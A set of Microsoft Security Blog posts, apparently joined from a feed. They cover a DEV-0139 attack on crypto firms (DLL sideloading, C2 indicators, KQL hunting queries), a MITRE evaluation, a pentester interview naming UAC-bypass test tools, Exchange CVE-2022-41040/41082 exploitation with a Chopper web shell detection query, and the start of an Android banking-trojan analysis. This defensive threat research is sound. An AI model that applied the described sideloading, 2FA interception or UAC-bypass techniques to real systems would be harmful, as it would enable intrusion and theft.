Once the file is loaded into the memory, it gives remote access to the threat actor. At the time of the analysis, we could not retrieve the final payload. However, we identified another variant of this attack and retrieved the payload, which is discussed in the next section. Identified implants were connecting back to the same command-and-control (C2) server.

Related attack

We identified another file using a similar mechanism as logagent.exe and delivering the same payload. The loader is packaged as an MSI package and as posed an application called CryptoDashboardV2 (Hash: e5980e18319027f0c28cd2f581e75e755a0dace72f10748852ba5f63a0c99487). After installing the MSI, it uses a legitimate application called tplink.exe to sideload the malicious DLL called DUser.dll and uses  DLL proxying as well.

Once the package is installed, it runs and side-loads the DLL using the following command: C:\Users\user\AppData\Roaming\Dashboard_v2\TPLink.exe” 27E57D84-4310-4825-AB22-743C78B8F3AA /sven, where it noticeably uses a different GUID.

Further analysis of the malicious DUser.dll showed that its original name is also HijackingLib.dll, same as the malicious wsock32.dll. This could indicate the usage of the same tool to create these malicious DLL proxies. Below are the file details of DUser.dll:

Once the DLL is running, it loads and decodes the implant in the memory and starts beaconing the same domain. In that case, the implant is using the GUID name 27E57D84-4310-4825-AB22-743C78B8F3AA and the XOR key /sven.

Implant analysis

The payload decoded in the memory by the malicious DLL is an implant used by the threat actor to remotely access the compromised machine. We were able to get the one from the second variant we uncovered. Below are the details of the payload:

First, the sample retrieves some information from the targeted system. It can connect back to a remote server and receive commands from it.

Infrastructure

It is interesting to notice that the threat actor abused OpenDrive in one of the variants to deliver the payload. The OpenDrive account has been set up quickly for a one shot, indicating that it was created for only one target.

We identified one domain used as C2 server, strainservice[.]com and connected back to the two implants. This domain was registered on June 26 on Namecheap, just before the distribution of the first variant. At the time of the attack, the server had port 80, 443, and 2083. The implants were communicated on port 443.

Defending against targeted attacks

In this report we analyzed a targeted attack on cryptocurrency investment fund startups. Such companies are relatively new, but manage hundreds of millions of dollars, raising interest by threat actors.   

In this attack we identified that the threat actor has broad knowledge of the cryptocurrency industry as well as the challenges their targets may face, increasing the sophistication of the attack and their chance of success. The threat actor used Telegram, an app widely used in the field, to identify the profile of interest, gained the target’s trust by discussing relevant topics, and finally sent a weaponized document that delivered a backdoor through multiple mechanisms. Additionally, the second attack identified was luring a fake crypto dashboard application.

The cryptocurrency market remains a field of interest for threat actors. Targeted users are identified through trusted channels to increase the chance of success. While the biggest companies can be targeted, smaller companies can also be targets of interest. The techniques used by the actor covered in this blog can be mitigated by adopting the security considerations provided below:

• Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion.
• Educate end users about protecting personal and business information in social media, filtering unsolicited communication (in this case, Telegram chat groups), identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
• Educate end users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent via instant messaging applications or social networks. Encourage end users to practice good credential hygiene and make sure the Microsoft Defender Firewall (which is enabled by default) is always on to prevent malware infection and stifle propagation.
• Change Excel macro security settings to control which macros run and under what circumstances when you open a workbook. Customers can also stop malicious XLM or VBA macros by ensuring runtime macro scanning by Antimalware Scan Interface (AMSI) is on. This feature—enabled by default—is on if the Group Policy setting for Macro Run Time Scan Scope is set to “Enable for All Files” or “Enable for Low Trust Files”.
• Turn on attack surface reduction rules to prevent common attack techniques observed in this threat:
  • Block Office applications from creating executable content
  • Block Office communication application from creating child processes
  • Block Win32 API calls from Office macros
• Ensure that Microsoft Defender Antivirus is up to date and that real-time behavior monitoring is enabled.

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

• TrojanDownloader:O97M/Wolfic.A
• TrojanDownloader:O97M/Wolfic.B
• TrojanDownloader:O97M/Wolfic.C
• TrojanDownloader:Win32/Wolfic.D
• TrojanDownloader:Win32/Wolfic.E
• Behavior:Win32/WolficDownloader.A
• Behavior:Win32/WolficDownloader.B

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

• An executable loaded an unexpected dll
• DLL search order hijack
• ‘Wolfic’ malware was prevented

Advanced hunting queries

The following hunting queries locate relevant activity.

Query that looks for Office apps that create a file within one of the known bad directories:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook" "powerpnt")
| where ActionType == "FileCreated"
| where parse_path( FolderPath ).DirectoryPath has_any(
    @"C:\ProgramData\Microsoft Media",
    @"C:\ProgramData\SoftwareCache",
    @"Roaming\Dashboard_v2"
    )
| project Timestamp, DeviceName, FolderPath, InitiatingProcessFileName, SHA256, InitiatingProcessAccountName, InitiatingProcessAccountDomain

Query that looks for Office apps that create a file within an uncommon directory (less that five occurrences), makes a set of each machine this is seen on, and each user that has executed it to help look for how many users/hosts are compromised:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "outlook", "powerpnt")
| where ActionType == "FileCreated"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize PathCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, Path, InitiatingProcessFileName, SHA256
| where PathCount < 5

Query that summarizes child process of Office apps, looking for less than five occurrences:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| summarize ProcessCount=count(), DeviceList=make_set(DeviceName), AccountList=make_set(InitiatingProcessAccountName) by FileName, FolderPath, SHA256, InitiatingProcessFileName
| where ProcessCount < 5

Query that lists of all executables with Microsoft as ProcessVersionInfoCompanyName, groups them together by path, then looks for uncommon paths, with less than five occurrences:

DeviceProcessEvents
| where ProcessVersionInfoCompanyName has "Microsoft"
| extend Path = tostring(parse_path(FolderPath).DirectoryPath)
| summarize ProcessList=make_set(FileName) by Path
| where array_length( ProcessList ) < 5

Query that searches for connections to malicious domains and IP addresses:

DeviceNetworkEvents
| where (RemoteUrl has_any ("strainservice.com")) 
     or (RemoteIP has_any ("198.54.115.248"))

Query that searches for files downloaded from malicious domains and IP addresses.

DeviceFileEvents
| where (FileOriginUrl  has_any ("strainservice.com")) 
     or (FileOriginIP  has_any ("198.54.115.248"))

Query that searchers for Office apps downloading files from uncommon domains, groups users, filenames, and devices together:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| summarize DomainCount=count(), UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName),
    FileList=make_set(FileName) by FileOriginUrl, FileOriginIP, InitiatingProcessFileName

Looks for downloaded files with uncommon file extensions, groups remote IPs, URLs, filenames, users, and devices:

DeviceFileEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt", "outlook")
| where ActionType == "FileCreated"
| where isnotempty( FileOriginUrl ) or isnotempty( FileOriginIP )
| extend Extension=tostring(parse_path(FolderPath).Extension)
| extend  Path=tostring(parse_path(FolderPath).DirectoryPath)
| summarize ExtensionCount=count(), IpList=make_set(FileOriginIP), UrlList=make_set(FileOriginUrl), FileList=make_set(FileName),
    UserList=make_set(InitiatingProcessAccountName), DeviceList=make_set(DeviceName) by Extension, InitiatingProcessFileName

Looks for Office apps that have child processes that match the GUID command line, with a check for Microsoft binaries to reduce the results before the regex:

DeviceProcessEvents
| where InitiatingProcessFileName has_any ("word", "excel", "access", "powerpnt")
| where ProcessVersionInfoCompanyName has "Microsoft"
| where ProcessCommandLine matches regex 
    @"[A-Za-z0-9]+\.exe [A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12} /[A-Za-z0-9]$"

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytic to automatically match the malicious IP and domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here:  https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy

To supplement this indicator matching customers can use the Advanced Hunting queries listed above against Microsoft 365 Defender data ingested into their workspaces as well as the following Microsoft Sentinel queries:

• Least common parent and child process pairs: https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows%20Security%20Events/Hunting%20Queries/Least_Common_Parent_Child_Process.yaml

• Detect anomalous process trees: https://github.com/Azure/Azure-Sentinel/blob/46906229919827bffa14211341f52dd68e27ad81/Hunting%20Queries/Microsoft%20365%20Defender/Execution/detect-anomalous-process-trees.yaml

Indicators of compromise

MITRE ATT&CK techniques

The post DEV-0139 launches targeted attacks against the cryptocurrency industry appeared first on Microsoft Security Blog.

We provided a seamless, comprehensive, and rapid response to the simulated attack using expert-led threat hunting and an industry-leading extended detection and response (XDR) platform—Microsoft 365 Defender. This evaluation showcased our service’s strength in the following areas:

• In-depth visibility and analytics across all stages of the attack chain.
• Comprehensive managed hunting.
• Seamless alert prioritization and consolidation into notifications for the security operations center (SOC).
• Tailored hunting guidance and advanced hunting queries (AHQ) to optimize investigations.
• Frequently updated and customized recommendations for rapid containment and remediation.
• Threat actor attribution with tactics, techniques, and procedures (TTP) context.
• Technology powered by a team of expert hunters and customer-centric approach.
• Commitment to managed extended detection and response (MXDR) partners running on Microsoft 365 Defender.

In-depth visibility and analytics across all stages of the attack chain

Figure 1. Microsoft Defender Experts for Hunting coverage. Fully reported—including initial access, execution, persistence, credential access, lateral movement, and collection—reflects 100 percent acceptance of evidence submission. Majority reported—including defense evasion, discovery, exfiltration, and command and control—reflects some gaps in evidence acceptance.

Comprehensive managed hunting

Microsoft Defender Experts for Hunting team identified all threats and provided a cohesive attack timeline with remediation guidance.

From the early stages of the intrusion, our hunters alerted the customer that a malicious archive masquerading as marketing materials was potentially part of a targeted attack. After a user opened the archive, a threat actor, which we attributed with high confidence as EUROPIUM, gained access to the environment.

Over the next few days, the threat actor used this foothold to steal credentials, move laterally in the network, deploy a web shell on an Exchange Server, and escalate privileges in the domain. The threat actor ultimately used their access to target sensitive data on an SQL server. Based on available telemetry, we reported that the threat actor staged sensitive data and may have successfully exfiltrated the data through email using a malicious RDAT utility.

Microsoft threat hunters discovered and investigated all of the essential and impactful TTPs used in this evaluation.

Seamless alert prioritization and consolidation into notifications for the SOC

From initial malware execution to data theft, Microsoft 365 Defender seamlessly detected and correlated alerts from all stages of the attack chain into two overarching incidents that provided end-to-end attack stories (see Figure 2). Microsoft 365 Defender’s incident correlation technology helps SOC analysts to counter alert fatigue, and our hunters then enrich these incidents by finding new attacks with the existing deep signals and custom alerting.

Figure 2. Consolidated incidents enriched by Defender Experts for Hunting as illustrated in the above tags.

Our hunters followed up on automated alerting with Defender Expert notifications (DENs) to provide additional context on the threat activity with an executive summary, threat actor attribution, detailed scope of impact, recommendations, and advanced hunting queries to self-serve investigations and response actions. This human enrichment helps the customer prioritize their time and focused actions in the SOC.

Figure 3. Beginning of incident executive summary provided by Defender Experts.

Tailored hunting guidance and AHQ to optimize investigations

Within the DENs, our hunters additionally provided tailored hunting guidance and AHQs to enable investigators to hunt for and identify relevant attack activity in each incident. Figure 4 shows one example where we directly flagged to the customer that a series of file modification events were consistent with data exfiltration attempts.

Figure 4. Example of running provided AHQs to surface activity of interest.

Frequently updated and customized recommendations for containment and remediation

Throughout the attack, our hunters regularly shared remediation guidance to aid the customer in a rapid response (Figure 5). As the incident developed, using the Recommendation Summary, we kept the customer apprised of the scope of the attack and the efforts needed to contain it.

Figure 5. Excerpt of custom recommendations in the Microsoft 365 Defender portal.

Threat actor attribution with TTP context

Microsoft Defender Experts for Hunting provided the customer with nation-state attribution based on observed TTPs and behaviors. We identified the activity was consistent with the threat actor EUROPIUM, also known as APT34 and OilRig, which Microsoft has observed as far back as 2015. EUROPIUM is a well-resourced actor capable of multiple types of attacks—from spear phishing and social engineering to remote exploitation of internet-facing devices.

We leveraged this attribution to provide valuable incident context, such as potential intrusion goals and relevant TTP, to the customer.

Figure 6. Incident attribution in Microsoft 365 Defender portal.

Technology powered by a team of expert hunters

The Microsoft philosophy in this evaluation was to represent product truth and real-world service delivery for our customers. We participated in the evaluation using our Defender Experts for Hunting team and product capabilities and configurations that we expect customers to use. As you review evaluation results, you should consider additional aspects including depth and durability of protection, completeness of signals, actionable insights, and the quality of what our hunters provided to enrich both the incidents and component alerts. All of these factors are critical in delivering a world-class hunting service to protect real customer production environments.

Commitment to MXDR partners running on Microsoft 365 Defender

Microsoft supported several of our verified MXDR partners in this evaluation. Our collaborative efforts reinforce our commitment to our MSSP partners’ success in building managed extended detection and response services to meet growing demand and support our joint customers.

We thank MITRE Engenuity for the opportunity to contribute to and participate in this year’s evaluation.

Read more about the MITRE Managed Services Evaluations.

Learn more

Learn more about Microsoft Defender Experts for Hunting.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

© November 2022 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.

The post Microsoft Defender Experts for Hunting demonstrates industry-leading protection in the 2022 MITRE Engenuity ATT&CK® Evaluations for Managed Services appeared first on Microsoft Security Blog.

Brooke: How did you get into cybersecurity?

Matthew: If your dad is a car mechanic, you grow up learning about cars. During the 1980s, my dad was super into computers. He used to go to my grandma’s school and bring home the computers prior to anyone really understanding what they were. These were the filing cabinet days and the days of carbon paper. Only very academic people and fringe technologists were interested in cybersecurity. When I was in high school, I had networks in my house with networked games. I started picking apart how the phone network worked and how internet access worked. My dad was supportive. He said, “If a 13-year-old kid can break into it, maybe we should not be using it.”

I pushed hard to get myself in front of as many people as I could and ended up working for a group from the National Computing Center. They had begun selling cybersecurity assurance services and penetration testing. I built a portfolio of my work publishing papers and showing people how computer systems were broken and how you could hack into them. At the time, you could not go to college and do cybersecurity. I dealt with a lot of rejection letters and a lot of people saying no and then I got my first job—that was 20 years ago. Now, I run my own company and I have written a book on the subject.

Brooke: What is most fascinating to you about cybersecurity?

Matthew: For me, it is the exciting element of offensive security testing. I take a low-privileged user on the system and say, “I want to make this user become a high-privileged user without authorization” and I will poke and probe my way through the system, testing all the boundaries and controls in place until I find ways to break it.

I began on an interesting journey; looking at things like state machines, where a computer will go through a lifecycle of a connection. When you connect your system to a server in the office, the computer will keep track of different states. For example, “Did you enter the right password?” and “Should it give you access?” I find these kinds of problems intellectually challenging and quite enjoyable.

Brooke: How do you help clients define and set goals for security control?

Matthew: There is a saying that this industry is run on fear, uncertainty, and doubt. I often ask clients: “If a hacker broke in tomorrow and had free rein of all your systems, what are you most concerned about?” We identify all the assets in the environment and their sensitive data and then review controls based on their concerns. Usually, they are most concerned about payment information and commercially sensitive information, or they are storing things that they perhaps should not have been storing, including credit card data and anything that could cause brand reputational damage.

It’s important to get board buy-in and foster a culture of cybersecurity in the organization and make it something that everybody in the company talks about regularly, like with phishing awareness.

Another key thing is to never punish the user. If they are at work and opening emails, that is what you are asking that person to do. Even the best cybersecurity professionals will click on a phishing link eventually. It’s human nature. These psychological lures are designed to get people to click on them. One of the most effective is a fake FedEx or UPS notification. Nine times out of 10, people will click on the link to track that parcel because they want to know. The attackers know our psychology and our natural human behaviors and how to get attacks through our radar in a way that does not alert us that we are being attacked. Proper cybersecurity in an organization takes human error into account.

Brooke: How do you reduce assessment times and identify threats faster?

Matthew: The MITRE ATT&CK^® Framework has been massively advantageous. It is a spreadsheet-based approach to understanding how an attacker behaves in an environment and it stems back to a paper written by Lockheed Martin. Lockheed Martin and the defense sector obviously were big targets for advanced persistent threats and cyber-enabled economic espionage, where nation-state actors break into their systems to steal information for espionage purposes.

Lockheed Martin came up with what they call the cyber kill chain, a timeline of an attack that starts at the very point that the attacker starts their breach into the network to the end—where they have exfiltrated and stolen the information. They modeled this and identified that the earlier you stop the attacker along this kill chain, the better, because they must start over again. The further along the chain they are, stopping the attack will cost the attacker more resources in terms of time and exploits used.

MITRE then came up with tools, techniques, and procedures. You can look at the threats in your industry and the known behaviors of threats targeting your sectors and begin unit testing those individual items. Instead of running a six-month engagement where we break into the client’s environment and do all this stealthy stuff, like monitor your network, we test against the actual threats and against these component items. That narrows the time involved in assessment activities and they get the result quicker.

Brooke: At what stage do clients bring your organization into the process?

Matthew: We work with a whole range of different clients, including people who have already built their product and people who have started to build their product. These kinds of strategies are usually very effective against large organizations—multinational corporations and Fortune 500 companies.

If you want to be effective in cybersecurity, the costs need to be on the attackers. We encourage organizations to move away from this longstanding engagement model and instead focus on doing unit tests against the actual situations they face. We call them cyber preparedness drills. We mimic the attacker’s behavior utilizing tools we’ve built, like these items we have published on GitHub for User Account Control (UAC) bypass testing:

• MsSettingsDelegateExecute
• Envschtasksuacbypass
• ColorDataProxyUACBypass
• iscsicpl_bypassUAC

These types of common attacker behaviors should be well-detected and even better detected by Microsoft Defender than they were previously. Simply scripting, even if it’s in the PowerShell command shell or the .NET developer platform and creating standard individual tests for specific items in the ATT&CK^® framework and running those as simulations gives you better results.

Brooke: What advice would you give to cybersecurity leaders on how to manage their budgets?

Matthew: There is a big push in the industry to do what is most interesting. Clients will say, “I want you to simulate a real attacker. I want the best hackers to throw everything you have at the system.” They want to spend a ton of money simulating a real attacker and I usually discover they have not covered any of the basics, like telemetry, alerting, or network defense.

It is easy to bring people on board, but if you have not looked at your environment and the basics, there is no point hiring a team to mimic your attacker and do a full six-month red team engagement. Your attacker is going to break into your network for free anyway, so you might as well focus on how you can use that budget to build better defenses to alert your team. So many companies do not know how many systems or databases they have, for instance. They do not have an accurate picture of what is happening in their environment. They look to the penetration testers who end up telling them more than they know about their network. 

Leaders should always ask: Do you have an accurate picture of the patch levels in your environment? If someone opens malware, can you see the events? Do you get the telemetry?

You could buy the best security system around and if it is getting 150 alerts a day but nobody is paying attention, it is useless because no one is going to ever act. When looking at your budget and how to spend it effectively, focus on granular engagement. When you hire a firm, hire one that has a good background and good understanding that can make effective use of that budget.

There are three approaches. There is a black box assessment methodology, where we know nothing about the environment, the target, or the target network. Then, you have a gray box methodology, where a client might share a little bit of information, such as what is given to a new starting staff member in an area where there is a high employee turnover rate. And third, there is a white box assessment, where they give us anything we want to know and we can see what they see. From our experience, you get the best results from white box assessments and from doing bite-sized exercises as your security provider is better informed and not reliant on guesswork achieved through the other two common methodologies.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Identifying cyberthreats quickly with proactive security testing appeared first on Microsoft Security Blog.

November 8, 2022 update – Microsoft has released patches for these issues. While Microsoft has not seen any further exploitation of these vulnerabilities in the wild since the targeted use in August, it is highly recommended that organizations patch their systems as attackers often reverse engineer patches to develop exploits.

October 1, 2022 update – Added information about Exploit:Script/ExchgProxyRequest.A, Microsoft Defender AV’s robust detection for exploit behavior related to this threat. We also removed a section on MFA as a mitigation, which was included in a prior version of this blog as standard guidance.

Microsoft is aware of limited targeted attacks using two reported zero-day vulnerabilities affecting Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019. The first one, identified as CVE-2022-41040, is a server-side request forgery (SSRF) vulnerability, while the second one, identified as CVE-2022-41082, allows remote code execution (RCE) when Exchange PowerShell is accessible to the attacker. Refer to the Microsoft Security Response Center blog for mitigation guidance regarding these vulnerabilities.  

CVE-2022-41040 can enable an authenticated attacker to remotely trigger CVE-2022-41082. However, authenticated access to the vulnerable Exchange Server is necessary to successfully exploit either vulnerability, and they can be used separately.

Microsoft released patches for these issues on November 8, 2022. Customers who haven’t patched yet are urged to do so as soon as possible. Mitigation guidance is still provided here for organizations that have not yet deployed a mitigation, and can be used while deploying patches. Customers are encouraged to enable the Exchange Emergency Mitigation Service, which allows mitigations to be deployed automatically for future incidents.  

Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malware and activity associated with these attacks. Microsoft will continue to monitor threats that take advantage of these vulnerabilities and take necessary response actions to protect customers.

Analysis of observed activity

Attacks using Exchange vulnerabilities prior to public disclosure

MSTIC observed activity related to a single activity group in August 2022 that achieved initial access and compromised Exchange servers by chaining CVE-2022-41040 and CVE-2022-41082 in a small number of targeted attacks. These attacks installed the Chopper web shell to facilitate hands-on-keyboard access, which the attackers used to perform Active Directory reconnaissance and data exfiltration. Microsoft observed these attacks in fewer than 10 organizations globally. MSTIC assesses with medium confidence that the single activity group is likely to be a state-sponsored organization.

Microsoft researchers were investigating these attacks to determine if there was a new exploitation vector in Exchange involved when the Zero Day Initiative (ZDI) disclosed CVE-2022-41040 and CVE-2022-41082 to Microsoft Security Response Center (MSRC) in September 2022.

Observed activity after public disclosure

On September 28, 2022, GTSC released a blog disclosing an exploit previously reported to Microsoft via the Zero Day Initiative and detailing its use in an attack in the wild. Their blog details one example of chained exploitation of CVE-2022-41040 and CVE-2022-41082 and discusses the exploitation details of CVE-2022-41040. It is expected that similar threats and overall exploitation of these vulnerabilities will increase, as security researchers and cybercriminals adopt the published research into their toolkits and proof of concept code becomes available.

While these vulnerabilities require authentication, the authentication needed for exploitation can be that of a standard user. Standard user credentials can be acquired via many different attacks, such as password spray or purchase via the cybercriminal economy. Prior Exchange vulnerabilities that require authentication have been adopted into the toolkits of attackers who deploy ransomware, and these vulnerabilities are likely to be included in similar attacks due to the highly privileged access Exchange systems confer onto an attacker.

Mitigation

Customers should refer to Microsoft Security Response Center’s post for the latest on mitigations for the Exchange product.

Microsoft Exchange Server customers using Microsoft 365 Defender are advised to follow this checklist:

• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
• Turn on tamper protection features to prevent attackers from stopping security services.
• Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
• Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
• Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
• Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.

Detection

Microsoft Defender Antivirus

Microsoft Exchange AMSI integration and Antivirus Exclusions

Exchange supports the integration with the Antimalware Scan Interface (AMSI) since the June 2021 Quarterly Updates for Exchange. It is highly recommended to ensure these updates are installed and AMSI is working using the guidance provided by the Exchange Team, as this integration provides the best ability for Defender Antivirus to detect and block exploitation of vulnerabilities on Exchange.  

Many organizations exclude Exchange directories from antivirus scans for performance reasons. It’s highly recommended to audit AV exclusions on Exchange systems and assess if they can be removed without impacting performance and still ensure the highest level of protection. Exclusions can be managed via Group Policy, PowerShell, or systems management tools like System Center Configuration Manager.

To audit AV exclusions on an Exchange Server running Defender Antivirus, launch the Get-MpPreference command from an elevated PowerShell prompt.

If exclusions cannot be removed for Exchange processes and folders, running Quick Scan in Defender Antivirus scans Exchange directories and files regardless of exclusions.

Microsoft Defender Antivirus detects the post-exploitation malware currently used in-the-wild exploitation of this vulnerability as the following:

Microsoft Defender for Endpoint

Microsoft Defender for Endpoint detects post-exploitation activity. The following alerts could be related to this threat:

As of this writing, Defender for Endpoint customers with Microsoft Defender Antivirus enabled can also detect the web shell malware used in in-the-wild exploitation of this vulnerability with the following alerts:

Microsoft Defender Threat Intelligence

Microsoft Defender Threat Intelligence (MDTI) maps the internet to expose threat actors and their infrastructure. As indicators of compromise (IOCs) associated with threat actors targeting the vulnerabilities described in this writeup are surfaced, Microsoft Defender Threat Intelligence Community members and customers can find summary and enrichment information for all IOCs within the Microsoft Defender Threat Intelligence portal.

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management identifies devices in an associated tenant environment that might be affected by CVE-2022-41040 and CVE-2022-41082. These vulnerabilities have been added to the CISA known exploited vulnerabilities list and are considered in the overall organizational exposure score. Customers can use the following capabilities to identify vulnerable devices and assess exposure:

• Use the dedicated dashboard for each of CVE-2022-41040 and CVE-2022-41082 to get a consolidated view of various findings across vulnerable devices and software.
• Use the DeviceTvmSoftwareVulnerabilities table in advanced hunting to identify vulnerabilities in installed software on devices. Refer to the following query to run:

DeviceTvmSoftwareVulnerabilities
| where CveId in ("CVE-2022-41040", "CVE-2022-41082")

NOTE: The assessments above do not currently account for the existence of a workaround mitigation on the device. Microsoft will continue to improve these capabilities based on the latest information from the threat landscape.

Advanced hunting

Microsoft Sentinel

Based on what we’re seeing in the wild, Microsoft Sentinel customers can use the following techniques for web shell-related attacks connected to these vulnerabilities. Our post on web shell threat hunting with Microsoft Sentinel also provides guidance on looking for web shells in general. 

The Exchange SSRF Autodiscover ProxyShell detection, which was created in response to ProxyShell, can be used for queries due to functional similarities with this threat. Also, the new Exchange Server Suspicious File Downloads and Exchange Worker Process Making Remote Call queries specifically look for suspicious downloads or activity in IIS logs. In addition to these, we have a few more that could be helpful in looking for post-exploitation activity:

• Exchange OAB virtual directory attribute containing potential web shell 
• Web shell activity 
• Malicious web application requests linked with Microsoft Defender for Endpoint alerts 
• Exchange IIS worker dropping web shell 
• Web shell detection 

Microsoft 365 Defender

To locate related activity, Microsoft 365 Defender customers can run the following advanced hunting queries:

Chopper web shell

Use this query to hunt for Chopper web shell activity:

DeviceProcessEvents
| where InitiatingProcessFileName =~ "w3wp.exe"
| where ProcessCommandLine has_any ("&ipconfig&echo", "&quser&echo", "&whoami&echo", "&c:&echo", "&cd&echo", "&dir&echo", "&echo [E]", "&echo [S]")

Suspicious files in Exchange directories

Use this query to hunt for suspicious files in Exchange directories:

DeviceFileEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName == "w3wp.exe"
| where FolderPath has "FrontEnd\\HttpProxy\\"
| where InitiatingProcessCommandLine contains "MSExchange"
| project FileName,FolderPath,SHA256, InitiatingProcessCommandLine, DeviceId, Timestamp

External attack surface management

Microsoft Defender External Attack Surface Management

Microsoft Defender External Attack Surface Management continuously discovers and maps your digital attack surface to provide an external view of your online infrastructure. Attack Surface Insights are generated by leveraging vulnerability and infrastructure data to showcase the key areas of concern for your organization.

A High Severity Observation has been published to surface assets within an attack surface which should be examined for application of the mitigation steps described above. This insight, titled CVE-2022-41082 & CVE-2022-41040 – Microsoft Exchange Server Authenticated SSRF and PowerShell RCE, can be found under the high severity observations section of the Attack Surface Summary dashboard.

The post Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082 appeared first on Microsoft Security Blog.

Our investigation of this new Android malware version started from our receipt of an SMS message containing a malicious link that led us to the download of a fake banking rewards app. The fake app, detected as TrojanSpy:AndroidOS/Banker.O, used a different bank name and logo compared to a similar malware reported in 2021. Moreover, we found that this fake app’s command and control (C2) server is related to 75 other malicious APKs based on open-source intelligence. Some of the malicious APKs also use the same Indian bank’s logo as the fake app that we investigated, which could indicate that the actors are continuously generating new versions to keep the campaign going.

This blog details our analysis of the recent version’s capabilities. We strongly advise users never to click on unknown links received in SMS messages, emails, or messaging apps. We also recommend seeking your bank’s support or advice on digital options for your bank. Further, ensure that your banking apps are downloaded from official app stores to avoid installing malware.

Observed activity

What the user sees

We have seen other campaigns targeting Indian banks’ customers based on the following app names:

• Axisbank_rewards.apk
• Icici_points.apk
• Icici_rewards.apk
• SBI_rewards.apk

Our investigation focused on icici_rewards.apk (package name: com.example.test_app), which presents itself as ICICI Rewards. The SMS campaign sends out messages containing a malicious link that leads to installing a malicious APK on a target’s mobile device. To lure users into accessing the link, the SMS claims that the user is being notified to claim a reward from a known Indian bank.

Upon user interaction, it displays a splash screen with the bank logo and proceeds to ask the user to enable specific permissions for the app.

The fake app asks for credit card information upon being granted all permissions. This should raise users’ suspicions on the app’s motive as apps typically ask for sensitive information only through user-driven transactions like paying for purchases.

The app displays another fake screen with further instructions to add to its legitimacy once users supply the information needed.

What happens in the background

Analyzing the XML file AndroidManifest further identifies the entry points of the malware along with the permissions requested. It also defines services that can run in the background without user interaction. The app uses the following permissions:

• READ_PHONE_STATE
• ACCESS_NETWORK_STATE
• READ_SMS
• RECEIVE_SMS
• READ_CALL_LOG
• FOREGROUND_SERVICE
• MODIFY_AUDIO_SETTINGS
• READ_CONTACTS
• RECEIVE_BOOT_COMPLETED
• WAKE_LOCK

The malware uses MainActivity, AutoStartService, and RestartBroadCastReceiverAndroid functions to carry out most of its routines. These three functions interact to ensure all the malware’s routines are up and running and allow the app to remain persistent on the mobile device.

MainActivity

MainActivity, also called the launcher activity, is defined under com.example.test_app.MainActivity. It is launched first after installation to display the fake app’s ICICI splash screen. This launcher activity then calls OnCreate() method to check the device’s internet connectivity and record the timestamp of the malware’s installation, and Permission_Activity to launch permission requests. Once the permissions are granted, Permission_Activity further calls AutoStartService and login_kotak.

The class login_kotak is responsible for stealing the user’s card information. It shows the fake credit card input page (Figure 5) and temporarily stores the information in the device while waiting for commands from the attacker.

AutoStartService

AutoStartService, themain handler of the malware, functions based on the commands it receives. The handler provides the malware with the following capabilities:

Enforcing its RAT commands

This malware’s new version adds several RAT capabilities that expands its information stealing. It enables the malware to add call log uploading, SMS message and calls interception, and card blocking checks.

These commands are described below.

The silent command, which the malware uses to keep the remote attacker’s SMS sending activities undetected, stands out from the list of commands. Many banking apps require two-factor authentication (2FA), often sent through SMS messages. This malware enabling an infected device’s silent mode allows attackers to catch 2FA messages undetected, further facilitating information theft.

Encryption and decryption of SMS messages

In addition to encrypting all data it sends to the attacker, the malware also encrypts the SMS commands it receives from the attacker. The malware decrypts the commands through its decryption and decoding modules. The malware uses a combination of Base64 encoding/decoding and AES encryption/decryption methods.

Stealing SMS messages

